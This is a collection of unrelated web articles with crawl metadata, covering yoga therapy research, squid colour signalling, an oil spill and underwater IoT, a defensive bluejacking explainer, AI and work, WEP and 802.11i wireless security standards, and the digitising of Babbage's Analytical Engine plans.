Yoga and multiple sclerosis: Several clinical trials investigated the potential beneficial effects of yoga therapy in patients with multiple sclerosis (MS), an autoimmune neuroinflammatory demyelinating disorder of the central nervous system. A study tested the effects of a 6 mo yoga intervention on the improvement of different aspects of physical as well as psychosocial conditions in 44 patients with MS and 17 healthy relatives.
This investigation has shown significant improvements in the quality of life, walking speed, fatigue, and depression values. However, yoga did not promote the pain, balance, and physical status of these patients. A pilot study on 12 patients suffering from MS has suggested that various yoga trainings for 6 mo may lead to a significant improvement in postural balance and daily physical activities.
Another clinical study on 24 participants diagnosed with mild to moderate MS, which underwent an intensive yoga practice for more than 4 mo, has shown marked improvements in the peak expiratory flow rate, physical conditions, mental health, and quality of life of patients with MS. A study conducted on 60 female patients with MS revealed that yoga training significantly improved physical abilities and sexual satisfaction. Yogic training and relaxation have also been suggested for the improvement of neurogenic bladder dysfunction in patients with MS.
A qualitative case investigation on a woman with MS suggested that individualized yoga intervention for 6 mo could be beneficial for the improvement of muscle tone and strength as well as self-confidence and stamina. A significant improvement in balance, gait, fatigue, walking speed, and step length has been reported in 18 patients with relapsing-remitting MS after a 12-wk yoga training. Yoga intervention has also exerted a beneficial role on improvements of postural balance and reduction of the influence of postural balance impairment during daily activities in patients diagnosed with MS after yoga practice for 6 mo. A meta-analysis of 10 randomized controlled trials with overall 693 patients with MS who trained with different forms of yoga has revealed a significant improvement of fatigue but no effects on the overall quality of life, sexual function, and psychosocial condition.
Yoga and Parkinson’s disease: The potential beneficial therapeutic effects of a yoga intervention for Parkinson’s disease (PD), a chronic and debilitating neurodegenerative disorder, have been investigated. Yoga exerts a range of beneficial effects on different symptoms of PD. A question-based survey on 272 patients with PD has shown that the majority of patients found yoga and meditation helpful for the alleviation of both motor and non-motor (fatigue, sleep difficulties, pain) symptoms.
A randomized clinical study on 126 patients with mild to moderate PD who underwent weekly yoga training for 8 consecutive weeks has shown a significant alleviation of psychological symptoms, improvement of the quality of life, and reduction of motor symptoms. Yoga exercises can improve flexibility and balance, decrease muscle rigidity, increase the range of motion, and promote muscle strength in patients with PD. Yoga intervention effectively improves balance and proprioceptive acuity in 33 patients with mild to moderate PD. It has been suggested that incorporating yoga and occupational therapy may promote balance and decrease falls in patients with PD. Yoga training decreases the back pain associated with a lower postural instability, which may reduce falls in patients with PD. Furthermore, yoga as adjunctive therapy in patients with PD has been suggested as an effective treatment for the reduction of psychological complications, particularly anxiety and depression[99-101].
Yoga and neuropathy: Peripheral neuropathy is a common neurological condition due to physical nerve injury, diabetes mellitus, autoimmune disorders, malignancy, kidney failure, nutritional deficiencies, systemic disorders, and idiopathic neuropathies, which can implicate the motor, sensory, and/or autonomous peripheral nerves[102,103]. Several lines of evidence suggest that yoga may alleviate symptoms of various neuropathies[104,105].
Several reports suggest the beneficial effects of yoga practices in patients with neuropathy. Yoga practices were shown to improve numbness and weakness in lower extremities after a stretch or compression injury of the gluteal nerves, alleviate chronic pain due to diabetic neuropathy, and promote sensory functions and muscle movement in subjects with diabetic peripheral neuropathy.
However, it should be noted that some reports indicate yoga-induced nerve injury and neuropathy[109-111], particularly in patients who take sedative medications, people with benign hypermobility of their connective tissue, and the elderly[110,112,113]. Furthermore, yoga may ease compression and decrease nerve compression in carpal tunnel syndrome, which could lead to the improvement of numbness after a few weeks of practice[114,115]. Yoga mediation therapy improved the nerve conduction velocity, which was associated with glycemic control, in patients with diabetic neuropathy[116,117]. A reduction of the impact of chemotherapy-induced peripheral neuropathy symptoms on the lives of patients with breast cancer as well as on the pain intensity after yoga intervention has been reported[118,119].
The clinical role of yoga in psychological disorders
Yoga, stress, and anxiety: Stress and anxiety are increasing in incidence worldwide. Approximately 34% of the general population is affected by an anxiety disorder during their lifetime. Several investigations were performed on the feasibility and potential efficacy of different forms of yoga on anxiety- and stress-induced symptoms in both children and adults. It has been suggested that yoga may promote mental and physical strength, increase stress resilience, and reduce anxiety.
Although some studies do not show any effect[122,123], most investigations indicate that yoga can be effective in the alleviation of anxiety in the form of monotherapy or adjunctive therapy[124-127]. Functional magnetic resonance imaging evaluation revealed that yoga interventions modulate the activity of various brain areas that are crucial to emotion regulation, such as the superior parietal lobule and supramarginal gyrus, and lead to a diminished sympathetic response to stressful emotional stimulations.
Training of mindfulness- and yoga-based programs has shown a significant reduction of anxiety symptoms, which was associated with a marked decrease of structural connectivity of the right amygdala. Furthermore, it has been suggested that yoga intervention modulates stress-induced autonomic regulatory reflex and inhibits the production of adrenocorticotropic hormone from the anterior pituitary gland, resulting in decreased production of cortisol from the adrenal gland.
A meta-analysis revealed that more yoga exercises were accompanied by greater benefits, particularly when subjects were suffering from higher values of anxiety at the early stages. Another meta-analysis of eight trials with 319 adults diagnosed with anxiety disorders who underwent yoga training indicates that yoga could be a safe and effective intervention to reduce the intensity of anxiety. Rhythmic yoga meditative interventions resulted in a reduction of stress associated with a higher plasma dopamine level together in 67 healthy subjects who regularly engaged in mind-body training. Enhancement of dopamine values following yoga practice leads to a suppression of corticostriatal glutamatergic transmission and regulation of conscious states. Yoga interventions have been suggested to enhance vigilance, improve sleep, and reduce anxiety in healthy security personnel.
Yoga-based exercises in schools have been suggested to reduce stress and challenging behavioral and cognitive responses to stress, promote physical ability, and strengthen cognitive performance among students[136,137]. Yoga interventions for a period of 8 wk have shown a significant impact on reducing anxiety in school-age children. Using a yoga-based relaxation method (mind-sound resonance technique) alleviated state anxiety and mind wandering and promoted state mindfulness and performance in school children.
High-frequency yoga breathing training promotes attention and reduces anxiety in students aged 11-12 years. Furthermore, evaluation of the effect of yoga intervention on stress perception and anxiety levels in college students has shown a significant reduction in anxiety and stress scores associated with a marked enhancement of total mindfulness. Yoga can also help adolescents hospitalized in an acute care psychiatric ward to lessen their emotional distress. Yoga exerts a bifacial effect on the reduction of anxiety and improvement of self-esteem in orphanage residents.
Practicing yoga in patients suffering from post-traumatic stress disorder for at least 4 wk resulted in a significant reduction of cortisol values. Yoga practices significantly reduce stress and anxiety in subjects living with human immunodeficiency virus, people with cancer, such as survivors of lung cancer and patients with breast cancer, patients with systemic disease, like rheumatoid arthritis[149,150], and patients with neurologic disorders, such as PD. Yoga exercises have also been suggested as a promising stress-relieving approach in pregnant women[151,152], in women receiving treatment for infertility, and in women who are trying to quit smoking[154,155].
Yoga and depression: Depression is the most common psychiatric disorder that affects 25% of women and 12% of men during their lifetime[156-159]. This disorder is commonly treated by antidepressants and psychotherapy[156,160]. Yoga interventions have been suggested as effective adjuvant therapy[161,162] as well as monotherapy for depression.
A narrative review on the efficacy of yoga and mindfulness as an adjuvant treatment in severe mental illnesses including major depressive disorder (MDD) indicated that both yoga and mindfulness have significant and beneficial effects on reducing the severity of depressive symptoms.
Yoga practices in combination with the application of conventional antidepressants significantly improved depression symptoms and reduced the remission rate in patients with MDD compared to control patients. A significant decrease in self-reported symptoms of depression after practicing yoga has been observed in individuals aged 18-29 with mild levels of depression. A meta-analysis has shown a more significant reduction in depression compared to psychoeducation.
In addition to the improvement of depression, yoga interventions promote mental health and quality of life and interrupt negative thinking in patients with depression[168,169]. A meta-analysis of 10 studies has shown that yoga practices have a statistically significant effect as an adjunct treatment in patients with MDD.
In an investigation of hospitalized patients with severe MDD, the effect of yoga intervention was equivalent to treatment with a tricyclic antidepressant. It has been suggested that yoga modulates cortical inhibition via the regulation of the GABAergic system and exerts beneficial effects in MDD.
Furthermore, increased GABA-mediated neurotransmitter activity induced by transcranial magnetic stimulation, and multiple yoga therapy sessions was associated with a significant improvement of depression symptoms in patients with MDD. Enhancement of thalamic GABA values has also been suggested as a potential mechanism for the improvement of mood in patients with MDD.
Enhancement of serum neurotrophic factors, such as brain-derived neurotrophic factor, in patients with MDD who practiced yoga, pointed to the possible role of increased neuroplasticity in the improvement of depression symptoms. Yoga practices in post-menopausal women resulted in reduced values of follicle-stimulating hormone and luteinizing hormone, which was associated with decreased stress levels and depression symptoms as well as improved quality of life. Yoga practices in association with coherent breathing intervention have been shown to resolve suicidal ideation in patients with MDD[9,176].
Yoga and bipolar affective disorder: Bipolar affective disorder (BD) is a chronic illness with recurrent episodes of manic or depressive symptoms[177,178]. Although most patients with BD are free of symptoms during remission, many of them continue to experience mild symptoms and suffer from functional behavior impairments[177,179]. Studies on the role of yoga in the treatment of BD are scarce. However, some studies have recommended yoga as a specific self-management strategy for BD[5,180].
Patients with BD have shown a significant alleviation of depression and anxiety symptoms, reduction in difficulties with emotion regulation, and improvement of mindfulness skills during the remission phase following several weeks of yoga practices. Yoga interventions have been suggested to decrease negative emotions in patients with BD. Yoga has also been suggested as an adjuvant therapy that improves residual depression symptoms as well as manic symptom severity of patients with BD. An extensive multicenter, randomized controlled study on 160 adults with BD has shown that mindfulness-based cognitive therapy, including yoga practices, improves the severity of manic symptoms and anxiety, promotes mental health and overall functioning, and reduces relapse rates.
Yoga and schizophrenia: Schizophrenia (SZ) is a severe mental disorder, which often exhibits itself by positive symptoms, including hallucinatory experiences and delusional beliefs and negative symptoms, such as lack of motivation and social contacts as well as the absence of spontaneous speech and affective flattening[186-188]. A growing body of evidence suggests that yoga training as an add-on therapy could improve both the negative and positive symptoms and promote cognitive functions and emotional recognition of SZ[189-194].
The analysis of yoga intervention effects on the mood of 113 patients with psychosis has revealed significant improvements in tension-anxiety, depression, anger, fatigue, and confusion. Another study on 66 antipsychotic-stabilized patients with SZ has revealed a significant improvement in positive and negative symptoms, socio-occupational functioning, and performance following yoga training.
A meta-analysis of 13 investigations with 1159 patients revealed the importance of the frequency of yoga interventions with an improvement of positive symptoms as well as the duration of each session with the alleviation of negative symptoms in patients with SZ. Yoga practices in the patients with SZ who were taking antipsychotic medications and were in a stable condition significantly decreased drug-induced parkinsonian symptoms and improved executive functions and negative symptoms. Long-term yoga intervention in patients with SZ resulted in greater social and occupational functioning and promoted the quality of life.
Yoga training in patients with SZ resulted in an improvement of negative and positive symptoms associated with a reduction of paranoid beliefs and promoting quality of life. Yoga as an add-on treatment has shown a greater improvement of the negative symptoms of SZ in comparison to physical exercise therapy. Furthermore, yoga therapy led to a significant reduction in burden scores and an improvement in the quality of life among patients with psychosis. Yoga intervention in patients with SZ significantly improved cognitive dysfunction, presumably through the correction of autonomic dysfunction[200,201].
It has been suggested that yoga may improve SZ symptoms by strengthening the synaptic network of the lateral and medial prefrontal areas and augmentation of the premotor and parietal mirror neuron circuitry. Oxytocin values increased significantly following yoga practice; an effect that has been suggested to play a potential role in the improvement of social cognition after yoga intervention in patients with SZ. Yoga practice in patients with SZ was also associated with a significant decrease in blood cortisol levels, suggesting a beneficial effect of yoga in the reduction of sociophysical stress of patients.
Yoga and other psychological disorders: Several other studies indicate the potential beneficial effects of yoga practices on other psychological disorders and syndromes, such as obsessive-compulsive disorder (OCD), burnout, somatoform disorders, and hypochondriasis. The treatment of OCD with yoga together with the pharmacological interventions improved the obsessive thoughts and compulsive behavior of patients with OCD[206,207].
Furthermore, several clinical trials have suggested the promise of yoga intervention as an adjunct therapy for patients with OCD, who were unresponsive to conventional treatments[208,209]. Moreover, yoga training enhanced general satisfaction, improved work exhaustion, and led to greater work engagement and empathy among teachers, nurses, hospice professionals, and physicians[213,214], who were suffering from job burnout. Yoga can promote the psychological and physical well-being of subjects with burnout, particularly when combining it with other activities, such as art and music-therapy[215,216].
Furthermore, yoga-based interventions have been recommended as an effective therapeutic approach in somatoform disorders. A 6 mo trial of yoga practices led to a significant improvement of somatoform symptoms, such as gastrointestinal, cardiovascular, and urogenital symptoms, in women with the menstrual disorder. Several studies have revealed the beneficial effects of yoga interventions on the psychological health of the population during the global pandemic of coronavirus disease 2019.
reference link : 10.5498/wjp.v11.i10.754
|
<urn:uuid:9c35f2c0-c3b5-440a-adde-83380eaf64d8>
|
CC-MAIN-2022-40
|
https://debuglies.com/2021/11/09/neuropsychological-disorders-therapeutic-role-of-yoga/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336921.76/warc/CC-MAIN-20221001195125-20221001225125-00047.warc.gz
|
en
| 0.926892 | 6,580 | 3.09375 | 3 |
The giant flying squid (Dosidicus Gigas) uses the ability to change color as a language: But in 2020, marine biologists discovered that the giant flying squid is surprisingly coordinated. Despite being very numerous, squid rarely collided or competed for the same prey. Scientists have hypothesized that the shimmering pigments allow the squid to quickly transmit complex messages, such as when preparing for an attack and when it is being targeted. The researchers noted that the squid showed 12 different pigmentation patterns in different sequences, similar to how humans arrange words in a sentence.
For example, the squid went dark while chasing prey and then switched to a half-light / half-dark mode just before the attack. The researchers suggested that these pigmentation changes in the body signal a definite action, such as “I’m about to attack”. Even more interesting (or worrying), the researchers also believe that the squid uses subtle pigment changes to provide more context to the action.
|
<urn:uuid:4502ab5e-1175-4e73-a94e-cbf8e6950257>
|
CC-MAIN-2022-40
|
https://keepnetlabs.com/friday-squid-blogging-the-language-of-the-jumbo-flying-squid/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336921.76/warc/CC-MAIN-20221001195125-20221001225125-00047.warc.gz
|
en
| 0.947147 | 196 | 3.734375 | 4 |
Guest Post by Kelly Potter of Transcendent.ai
In 2010, the Deepwater Horizon oil tragedy struck and took the nation’s attention for months.
Two-hundred million gallons of oil spilled, 16,000 miles is the range it spread across the coastline from Florida to Texas, 8,000 animals were killed, and 11 workers were killed due to the explosion. Communities around the Gulf of Mexico came to a halt, but lurking underneath this disaster was an older spill spewing from an oil platform that was damaged six years earlier.
CNN recently reported “The Taylor oil spill is still surging after all this time; dumping what’s believed to be tens of thousands of gallons into the Gulf per day since 2004.”
By some estimates, the chronic leak could soon be larger, cumulatively, than the Deepwater disaster. That would also make the Taylor spill one of the largest offshore environmental disasters in U.S. history.
In September, the Department of Justice submitted an independent study into the nature and volume of the spill that claims previous evaluations of the damage, submitted by the platform’s owner Taylor Energy Co. and compiled by the Coast Guard, significantly underestimated the amount of oil being let loose.
According to the filing, “the Taylor spill is spewing anywhere from 10,000 to 30,000 gallons of oil a day.
As for how much oil has been leaked since the beginning of the spill, it’s hard to say. An estimate from SkyTruth, a satellite organization, put the total at “855,000 to 4 million gallons by the end of 2017. If you do the math from the DOJ’s filing, the number comes out astronomically higher: More than 153 million gallons over 14 years.”
It’s still unclear how the Taylor oil spill is being addressed by officials regarding an action plan for cleanup, current and future prevention, and ways to better detect these incidents occur.
So the questions become:
- How can we continue to grow and learn from these incidents?
- What new technologies are out there to enhance detection?
- What preventive measures should the oil industry be implementing that aren’t currently in place?
5 Preventive Measures Currently in the Oil Industry
Since the BP oil spill, several preventive maintenance measures have been put in place for the oil industry; these measures should be coupled with an effective maintenance management system to allow managers to track & monitor asset functionality, locate work history, and plan for replacement/repair on said assets based on operating capabilities.
Preventive maintenance steps being performed today:
- Stress tests performed to assess accuracy and tracking through management documentation
- Better documentation of work orders and training crew members on new practices
- Blue print creation- Allows users to use existing technology to respond quickly to oil spills and better assess the situation
- New equipment that allows rigs to communicate with plans and ships more freely and coordinate response efforts to future spills
- Remote operated vehicles- Robots that assist crew members as backup in disaster situation
These measures coupled with an EAM CMMS solution can help managers and engineers execute tasks properly and efficiently. Engineers have the ability to complete work orders, work requests, and inspections all from their mobile phone with a proper EAM CMMS solution. This eliminates the need for paper trails and gives managers a more accurate look at the work completed and gets problems resolved in real-time.
However, over the last nine years, technology has advanced in areas such as IoT, Augmented Reality, Virtual Reality, and even Drone maintenance. It is said that in “2020, approximately 50 billion machines will be connected to the internet,” making it easier for technology to guide the way engineers/workers interact and do their jobs on a day to day basis.
The oil industry could benefit from new innovations in the IoT realm in regards to underwater communication systems.
Internet of Things and Underwater Communications
The benefits of IoT (the Internet of Things) to a number of industries are obvious – mainly the ability to remotely monitor machines in real-time while ensuring safety and anticipating breakdowns. However, there are technical challenges when it comes to monitoring and communicating underwater which is where IoT Underwater comes into play.
IoT Underwater is a system made of unmanned vehicles that scour the sea while communicating with underwater sensors and sending the information to networks on the surface.
This information can be used to detect:
- Early signs of tsunamis
- Surveying shipwrecks and crashes
- Health of animals
- Salinity and temperature changes
This kind of IoT that senses and transmits data through water would be important in the protection of oceans and lakes. This type of technology could alert oil rigs and engineers of inadequacies under the shore alerting them something could be wrong before a catastrophe does occur and last for years.
There are still challenges that scientists and engineers are facing when looking at the reality of IoT underwater, such as signal transmission, background noise, sensors come at a high cost, and the environment is ever-changing.
Still, when looking into the future, companies are already looking for solutions to these challenges. There are underwater robots and prototypes being created to test out these roadblocks to see how communication is being translated from underwater to onshore devices.
It’s a step in the right direction and a direction that industries, such as oil & gas, should consider when looking at innovative and safe ways to protect oceans and humans.
Powerful Data Capture Apps for Inspectors, Exploration or Production Teams
Safety Inspections • Pipeline Inspections • Gemba Walks • Platform Audits • Certifications and Training •
Pumpjack Inspections • Work Orders • Time and Attendance • ISO Certifications •
Dispatch • Licensing • and more,,,
|
<urn:uuid:854fcc6e-df56-4b1b-9874-c79d2f5361b7>
|
CC-MAIN-2022-40
|
https://www.alphasoftware.com/blog/how-the-oil-industry-can-benefit-from-iot-technology
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337398.52/warc/CC-MAIN-20221003035124-20221003065124-00047.warc.gz
|
en
| 0.947485 | 1,196 | 2.546875 | 3 |
What bluejacking is and how to defend against it
Bluejacking refers to an attack targeting Bluetooth-enabled devices like smartphones, laptops, and smartwatches. The typical approach involves sending unsolicited messages to the nearby targets within the Bluetooth range. At first glance, bluejacking might seem irritating but harmless in the end. However, attackers can send malicious content, links, or files with the intent to hack and damage. So, this Bluetooth hacking can transmit threatening messages, images, or promotional content.
What is bluejacking?
Bluejacking is a technique of sending anonymous unwanted messages to users. Such attacks typically occur in crowded public places. Thus, hackers detect and connect to Bluetooth-enabled devices in close proximity. The technique exploits the element of surprise and hopes users will react on the spur of the moment.
Luckily, bluejacking is not highly popular anymore. Some pranksters still try to intimidate their victims by delivering odd or alarming messages.
Initially, hackers would send messages, but smartphone capabilities have opened venues for images, sounds, and videos.
How does bluejacking happen?
Bluejacking happens when attackers find targets nearby the areas they are in. Such targeting might be specific, with hackers coming to select locations. However, the victim screening might be random, picking those with enabled Bluetooth settings.
The maliciousness of such unsolicited messages depends on their content. Are they humorous, simply aimed to irritate? They also can be more deceptive, mimicking banking or other official services.
The typical sequence of bluejacking is as follows:
- Culprits go to a select location, preferably one with many people.
- Attackers search for Bluetooth-enabled devices nearby.
- They then try to pair their device with the target.
- Some targeted devices can require authentication, like providing a password. A common way to avert this is to use brute force attacks.
- Hackers can now send unsolicited messages to the victim if a connection gets established.
Considering the vulnerability of Bluetooth, attackers can engage in many Bluetooth-targeting techniques. Bluejacking is one of them, but bluebugging and bluesnarfing are also possible exploits.
Comparing bluejacking, bluesnarfing, and bluebugging
Bluetooth, like any technology, is not bulletproof. From vulnerabilities to other hacking tactics, Bluetooth faces many threats. Bluejacking is only one of them, and users might confuse it with other similar strategies.
- Bluejacking. Hackers connect to nearby Bluetooth devices and send unsolicited messages. It can be harmless unless the transmitted content has malicious components like fake links, comparable to smishing.
- Bluebugging. It is a technique for targeting cell phones. Essentially, hackers exploit a flaw (a bluebug) to access a device. After that, it is possible to do much more harm than with bluejacking. Attackers can initiate phone calls, send text messages, connect to the internet, and read contacts.
- Bluesnarfing. While bluejacking delivers unwanted messages to targeted devices, bluesnarfing aims to extract information. Hackers can access various device components through a Bluetooth connection, like contacts, calendars, photo galleries, and more. Thus, this Bluetooth attack can be devastating as it facilitates data theft.
How dangerous can bluejacking be?
There is usually no harm in receiving unexpected messages. Nevertheless, there are scenarios where bluejacking can turn dangerous. Besides transmitting malicious links or files, let’s consider an example of a dangerous bluejacking attack.
Presume that you have received a bizarre message on a wearable device (say, smartwatch). Accidentally, you have responded to the message, confirming the initiated request. However, an attacker had sent a request to synchronize daily tracking data. Without even realizing it, you could accidentally validate such a message.
Protect your device from bluejacking
It is relatively easy to avoid bluejacking. The following tips will help you protect your device from Bluetooth-targeting attacks and other illegal acts.
- Disable Bluetooth if not in active use. Keep Bluetooth turned off if your device does not connect to other gadgets. This change will not only evade attacks against Bluetooth. For instance, it can also minimize location tracking done through Bluetooth.
- Make your Bluetooth undiscoverable. When you need to have your Bluetooth enabled, set it as hidden. It will prevent other Bluetooth devices from recognizing your device. For instance, you will need to turn off open detection on some devices.
- Be wary of messages and emails. Besides bluejacking, there are other ways to deliver social engineering scams. Users should know the basics of recognizing deceptive messages. The main rule is never to open files or follow links found in emails or texts.
- Lock your device. Having a password-protected device is essential. Thus, pick the best lock for your smartphone, tablet, or computer.
- Enable two-factor authentication. Passwords are not foolproof. From simple combinations to leaked passwords, various scenarios can lead to account takeover. Therefore, enable 2FA on all services you use.
- Avoid public Wi-Fi. Free hotspots can be a blessing, especially if you run low on cellular data. However, experts discourage you from connecting to any free Wi-Fi network you encounter. If you are an avid user of such networks, the next tip can be a gamechanger to your experience.
- Encrypt internet traffic. Public Wi-Fi frequently lacks encryption, which means that your online activities are susceptible to snooping. A Virtual Private Network encrypts your connection and stops entities from learning your digital habits. It is the go-to tool for becoming more private and secure online.
|
<urn:uuid:73dbdd1d-514e-4eef-b8b5-1a24cb8f52f4>
|
CC-MAIN-2022-40
|
https://atlasvpn.com/blog/what-bluejacking-is-and-how-to-defend-against-it
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337504.21/warc/CC-MAIN-20221004121345-20221004151345-00047.warc.gz
|
en
| 0.905633 | 1,178 | 3.046875 | 3 |
Artificial Intelligence and the Future of Work and Business
One of the most prominent themes in science fiction is robots taking over. But while this may seem a fantasy, job security and business viability are genuine fears affecting individuals and organizations across a wide spectrum.
In this respect, discussions surrounding artificial intelligence (AI) come to light, sparking mixed responses. If you’re confused about what AI is, and how it impacts you as an employee or small business owner, you have come to the right place!
In today’s blog post, we cut to the chase, avoiding complex terms and telling you the nitty-gritty of what this technology is and what the future holds.
Artificial Intelligence 101
In the most basic terms, AI is where technology mimics human thinking. As our world becomes smarter and more connected, machines are also beginning to sense, learn, react, and adapt to real-life situations, creating amazing interactions between people and computers.
The two core concepts of AI are:
Machine Learning (ML)
ML is a computational method that enables machines to think and act specific functions without being explicitly directed to do.
This is a branch of ML that uses neural network models to process and make sense of large amounts of data by speeding up processes like speech recognition.
It’s crucial that we also know what AI is not. Again, talking about science fiction, AI is not like SkyNet or HAL. It’s not ‘alive’. Even the most interactive and seemingly spontaneous tasks performed by a machine are programmed into it. An AI can only think and set tasks for itself in a very limited context.
Indeed, some characterizations of AI and its impact are grossly exaggerated. What we do know so far is that AI can help you automate everyday tasks, and help you make sense of large amounts of data quickly. And this is where its implications on work and business begin.
What AI Means for the Future of Business
Considering its nature, AI has tremendous potential in all kinds of industries. Here are a few examples:
AI can help doctors make timely and more accurate diagnoses, which lead to timely treatments and improved outcomes.
Self-driving cars are a possibility as they can learn from data of millions of cars, improving safety.
AI can benefit finance in many ways. AI can help organizations and experts to sift through large volumes of data and notice trends and patterns that help in better and faster decision-making. Even banks can analyze spending patterns and catch unusual activity to crack down on fraud before it occurs.
So, AI adoption has far-reaching implications for all industries. Even farmers can benefit by tracking weather and soil conditions in real-time, leading to greater yields, even in unpredictable climates.
And while AI adoption is far from reaching its potential, the majority of businesses experimenting with Artificial Intelligence report tangible benefits. Automation helps businesses improve efficiencies and accuracy across departments such as sales, customer support, and even human resources. This helps justify investment in AI, even for small businesses, because it will ultimately lower your business costs by removing inefficiencies.
And as more business processes are automated, the workforce becomes free to focus on tasks that require creativity and critical thinking. This brings us to the next point.
What about Jobs?
In many areas, AI is matching human capabilities, which leads to concern about job security. Will AI change the workforce in the future?
It is hard to say at this point. What will really happen is that many jobs that involve repetition will become redundant.
But this is not an altogether bad thing as AI helps the human workforce to concentrate on the valuable tasks that fully utilize their skills. Among other things, this leads to a greater level of professional fulfillment, and surveys do show that AI has helped in employee retention, even if on a limited scale.
Moreover, as AI brings new capabilities to businesses, many new jobs will be created in the process as well. What businesses need is to engage employees at the earliest stages of AI development so that they can use it to boost their own skills and become better at their jobs.
And companies that do this sooner rather than later are more likely to benefit in the long run.
At Cleartech Group, we have gathered a group of experts who have knowledge and expertise in managing your IT needs and who are committed to staying on top of current trends. Contact us at (978)466-1938 or at www.cleartechgroup.com
|
<urn:uuid:a5d057ab-7885-48b8-ab61-0ceb32fba11b>
|
CC-MAIN-2022-40
|
https://www.cleartechgroup.com/artificial-intelligence-and-the-future-of-work-and-business/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337504.21/warc/CC-MAIN-20221004121345-20221004151345-00047.warc.gz
|
en
| 0.959128 | 930 | 2.578125 | 3 |
The security built into Wi-Fi is better than no security at all—but not by much. Standards bodies are at work, though, on a framework that will free IT managers from some of the heavy lifting they have to do to get WLANs up to enterprise code.
During the past two years, the IEEE has been working on the 802.11i security standard. This standard is designed to address known WEP (Wired Equivalent Privacy) vulnerabilities and provide significant enhancements to 802.11-based equipment. 802.11i calls for a better authentication scheme—via 802.1x—and two new encryption protocols that will replace WEP.
The IEEE-ratified 802.1x, which provides a framework for stronger user authentication and a centralized security management model, comprises three components: the supplicant, a client machine trying to access the wireless LAN; the authenticator, a Layer 2 device that provides the physical port to the network (such as an access point or a switch); and the authentication server, which verifies user credentials and provides key management.
802.1x supports the use of an authentication server or a database service, including a Remote Authentication Dial-In User Service, or RADIUS, server; an LDAP directory; a Windows NT Domain; or Active Directory.
The upper-layer authentication protocol used by 802.1x components is called EAP (Extensible Authentication Protocol). EAP is a challenge-response protocol that can be run over secured transport mechanisms such as TLS (Transport Layer Security) and TTLS (Tunneled TLS).
EAP-TLS is a certificate-based protocol supported natively in Windows XP. Both the client and the authentication server require certificates to be configured during initial implementation.
EAP-TTLS can be used to provide a password-based authentication mechanism. In EAP-TTLS implementations, only the authentication server is required to have a certificate.
Cisco Systems Inc.s proprietary LEAP (Lightweight EAP) was the first password-based authentication scheme available for WLANs. Ciscos Aironet AP supports LEAP and EAP-TLS.
Although 802.1x will help fix the static WEP key security issues, it is strictly an authentication standard and does not address the encryption weaknesses found in WEP. The Wi-Fi Alliance, working with the IEEE, has devised a security standard called WPA (Wi-Fi Protected Access) that will reach the product certification stage this year.
WPA uses 802.1x for authentication but adds a stronger encryption element from the 802.11i draft called TKIP (Temporal Key Integrity Protocol). TKIP addresses all the known deficiencies in the WEP algorithms but maintains backward compatibility with legacy 802.11 hardware.
TKIP works like a “wrapper” around WEP, adding multiple enhancements to the WEP cipher engine. TKIP ex-tends the IV (initialization vector) from 24 bits in WEP to 48 bits to address replay attacks. The IV is used to encrypt the data in a packet.
Extending the IV to 48 bits greatly increases the number of possible shared keys, to protect against replay attacks. Some vendor implementations of WEP use the same IV for all packets for the lifetime of the connection or rotate the IV in a predictable manner. TKIP uses better sequencing rules to ensure that the IV cannot be reused even if intruders got hold of it.
WPA also adds Message Integrity Code, a cryptographic checksum that protects against forgery attacks.
The transmitter of a packet adds about 30 bits (the MIC) to the packet before encrypting and transmitting it. The recipient decrypts the packet and verifies the MIC (based on a value derived from the MIC function) before accepting the packet. If the MIC doesnt match, the packet is dropped.
Having the MIC ensures that modified packets will be dropped and attackers wont be able to forge messages to fool network devices into authenticating them.
Per-packet key mixing of the IV prevents weak key attacks. A new key derivation scheme helps to minimize the amount of information gained on a successful forgery attempt.
With TKIP implemented on both the access point and all client devices, a different key is generated to encrypt each new packet. This will ensure that hackers with exploited IVs cannot predict the base WEP key.
Although WPA brings a welcome boost to WLAN security, many view it as a temporary fix because future 802.11 equipment will likely use the Counter Mode with CBC-MAC Protocol, or CCMP, which is also a part of the 802.11i draft. CCMP uses AES (Advanced Encryption Standard) to provide even stronger encryption. However, AES requires a good amount of processing power—which likely means upgrading hardware to see optimal performance—and is not designed for backward compatibility.
Certification of the new security enhancements in the 802.11i standard is just starting, and Wi-Fi products supporting WPA will make their way slowly to market this year.
Technical Analyst Francis Chu can be reached at [email protected].
- Security of the WEP algorithm www.isaac.cs.berkeley.edu/isaac/wep-faq.html
- 802.11i draft and call for interest on link security for IEEE 802 networks grouper.ieee.org/groups/802/linksec/meetings/MeetingsMaterial/Nov02/halasz_sec_1_1102.pdf
- 802.1x: port-based network access control www.ieee802.org/1/pages/802.1x.html
- Open-source implementation of 802.1x open1x.sourceforge.net/
|
<urn:uuid:935c469c-9c3a-4910-9489-1620121ac047>
|
CC-MAIN-2022-40
|
https://www.eweek.com/security/standards-will-fill-holes-in-wep-authentication-and-encryption/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337504.21/warc/CC-MAIN-20221004121345-20221004151345-00047.warc.gz
|
en
| 0.883901 | 1,219 | 2.578125 | 3 |
The Science Museum in London has agreed to plans which will see the sketches and notes made by Charles Babbage, the grandfather of computing, digitised and made publicly available.
The Museum's announcement comes after campaigners looking to create a fully-functional implementation of Babbage's Analytic Engine asked the Museum for access to the files located in its archives.
Designed in the 1830s, the Analytical Engine was to be Babbage's most ambitious creation: building on the work carried out on the Difference Engine, the Analytical Engine upgraded what was little more than an early calculator to a Turing-complete computer with input - punch cards - mechanical processing, and output to printer, plotter, or bell.
Sadly, while Babbage's designs are believed to be sound, the complexity of the project proved too much for the technology of his time. At the time of his death in 1871, only a small fraction of the Analytical Engine had been constructed.
Many are now working to create a simulation of the Analytical Engine using Babbage's original notes and plans, as a precursor to building a working implementation using modern construction methods. Efforts by John Graham-Cumming and the Science Museum's curator of computing, Doron Swade, to make the notes available to all will be invaluable in this process.
Sadly, it won't all be plain sailing. "There are some complete plans, they are just not totally complete. There will be a degree of interpretation," Graham-Cumming admitted (opens in new tab) to the BBC.
The project's members hope to complete the rebuild by 2021, to commemorate the 150th anniversary of Babbage's death.
|
<urn:uuid:c18e600f-bcc2-4fb0-868e-4d65c4b51f90>
|
CC-MAIN-2022-40
|
